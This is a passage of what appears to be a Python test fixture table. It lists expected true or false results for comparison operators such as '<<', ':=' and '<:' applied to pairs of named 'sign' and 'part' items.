('part', 's1', 'sign', 'a', True),
('sign', 'a', 'part', 's1', False),
('part', 's1', 'part', 's1', False),
('part', 's1', 'part', 'ss1', True),
('part', 'ss1', 'part', 's1', True),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'mary', True),
('part', 'mary', 'part', 'john', True),
('part', 'big', 'part', 'small1', True),
('part', 'big', 'part', 'small2', True),
('part', 'big', 'part', 'small3', True),
('part', 'big', 'part', 'small4', True),
('part', 'big', 'part', 'small5', False),
('part', 'big', 'part', 'small6', False),
('part', 'big', 'part', 'small7', False),
('part', 'big', 'part', 'small8', False),
('part', 'small1', 'part', 'big', False),
('part', 'small2', 'part', 'big', False),
('part', 'small3', 'part', 'big', False),
('part', 'small4', 'part', 'big', False),
('part', 'small5', 'part', 'big', False),
('part', 'small6', 'part', 'big', False),
('part', 'small7', 'part', 'big', False),
('part', 'small8', 'part', 'big', False),
),
']]': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('part', 's1', 'sign', 'a', False),
('sign', 'a', 'part', 's1', True),
('part', 's1', 'part', 's1', False),
('part', 's1', 'part', 'ss1', True),
('part', 'ss1', 'part', 's1', True),
('part', 'john', 'part', 'john', False),
('part', 'john', 'part', 'mary', True),
('part', 'mary', 'part', 'john', True),
('part', 'big', 'part', 'small1', False),
('part', 'big', 'part', 'small2', False),
('part', 'big', 'part', 'small3', False),
('part', 'big', 'part', 'small4', False),
('part', 'big', 'part', 'small5', False),
('part', 'big', 'part', 'small6', False),
('part', 'big', 'part', 'small7', False),
('part', 'big', 'part', 'small8', False),
('part', 'small1', 'part', 'big', True),
('part', 'small2', 'part', 'big', True),
('part', 'small3', 'part', 'big', True),
('part', 'small4', 'part', 'big', True),
('part', 'small5', 'part', 'big', False),
('part', 'small6', 'part', 'big', False),
('part', 'small7', 'part', 'big', False),
('part', 'small8', 'part', 'big', False),
),
'<<': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'c', 'sign', 'g', True),
('sign', 'g', 'sign', 'c', False),
('sign', 'c', 'part', 's2', False),
('sign', 'c', 'part', 's3', False),
('sign', 'c', 'part', 's4', True),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', False),
('part', 's4', 'part', 's3', False),
('part', 's4', 'part', 's4', False),
('part', 's4', 'part', 's5', True),
('part', 's3', 'part', 's4', True),
('part', 's5', 'part', 's4', False),
('part', 's2', 'part', 'big', True),
('part', 's3', 'part', 'big', False),
('part', 's4', 'part', 'big', False),
('part', 'big', 'part', 's2', False),
('part', 'big', 'part', 's3', False),
('part', 'big', 'part', 's4', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'odd', 'part', 'even', False),
('part', 'even', 'part', 'odd', False),
),
'>>': (
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'c', 'sign', 'g', False),
('sign', 'g', 'sign', 'c', True),
('sign', 'c', 'part', 's2', True),
('sign', 'c', 'part', 's3', False),
('sign', 'c', 'part', 's4', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', True),
('part', 's4', 'part', 's3', True),
('part', 's4', 'part', 's4', False),
('part', 's4', 'part', 's5', False),
('part', 's3', 'part', 's4', False),
('part', 's5', 'part', 's4', True),
('part', 's2', 'part', 'big', False),
('part', 's3', 'part', 'big', False),
('part', 's4', 'part', 'big', False),
('part', 'big', 'part', 's2', True),
('part', 'big', 'part', 's3', False),
('part', 'big', 'part', 's4', False),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'odd', 'part', 'even', False),
('part', 'even', 'part', 'odd', False),
),
'=:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
'=0:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
'=1:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
'=2:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', True),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', True),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', True),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', True),
('part', 's1', 'part', 'ss4', False),
('sign', 'a', 'part', 'odd', True),
('part', 'odd', 'sign', 'a', True),
('part', 's1', 'part', 'odd', True),
('part', 'd4', 'part', 't3', True),
('part', 'lower', 'part', 'odd', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', True),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
':=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':0=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':1=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
':2=': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', True),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', True),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', True),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', True),
('part', 's1', 'part', 'ss4', False),
('sign', 'i', 'part', 'odd', True),
('part', 'odd', 'sign', 'i', True),
('part', 's9', 'part', 'odd', True),
('part', 'd3', 'part', 't2', True),
('part', 'upper', 'part', 'even', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', True),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
'::': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':0:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', False),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', False),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', False),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', False),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', False),
),
':1:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', False),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', False),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', False),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', False),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
':2:': (
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', True),
('sign', 'a', 'sign', 'd', False),
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'part', 's2', True),
('sign', 'a', 'part', 's3', True),
('sign', 'a', 'part', 's4', False),
('part', 's1', 'sign', 'a', True),
('part', 's1', 'sign', 'b', True),
('part', 's1', 'sign', 'c', True),
('part', 's1', 'sign', 'd', False),
('part', 's1', 'part', 'ss1', True),
('part', 's1', 'part', 'ss2', True),
('part', 's1', 'part', 'ss3', True),
('part', 's1', 'part', 'ss4', False),
('part', 'odd', 'sign', 'a', False),
('part', 's1', 'part', 'odd', False),
('part', 'lower', 'part', 'odd', False),
('part', 'john', 'part', 'john', True),
('part', 'john', 'part', 'fred', True),
('part', 'jim', 'part', 'all', True),
('part', 'jim1', 'part', 'all', True),
('part', 'jim2', 'part', 'all', True),
('part', 'jim3', 'part', 'all', False),
('part', 'jim1', 'part', 'jim2', True),
),
'<:': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', False),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', False),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', False),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', False),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
'<0:': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', False),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', False),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', False),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', False),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
'<1:': (
('sign', 'a', 'sign', 'c', True),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', False),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', True),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', False),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', True),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', False),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', True),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', False),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', True),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', True),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', True),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', True),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', True),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', True),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
'<2:': (
('sign', 'a', 'sign', 'c', True),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', True),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', True),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', True),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', True),
('part', 'upper', 'part', 'lower', False),
('part', 'd2', 'part', 'small2', True),
('part', 'small2', 'part', 'd2', False),
('part', 't3', 'part', 'small2', False),
('part', 'small2', 'part', 't3', True),
('part', 'tim', 'part', 'tom', True),
('part', 'tom', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1n', True),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', True),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', True),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', True),
('part', 'tom2p', 'part', 'tim', True),
('part', 'timb', 'part', 'tomb', True),
('part', 'tomb', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1n', True),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', True),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', True),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', True),
('part', 'tomb2p', 'part', 'timb', True),
('part', 'time', 'part', 'tome', False),
('part', 'tome', 'part', 'time', True),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', True),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', True),
('part', 'time', 'part', 'tome2n', True),
('part', 'tome2n', 'part', 'time', True),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', True),
),
':>': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', False),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', False),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
':0>': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', False),
('sign', 'c', 'sign', 'c', False),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', False),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', False),
('part', 's3', 'part', 's3', False),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', False),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', False),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', False),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', False),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', False),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', False),
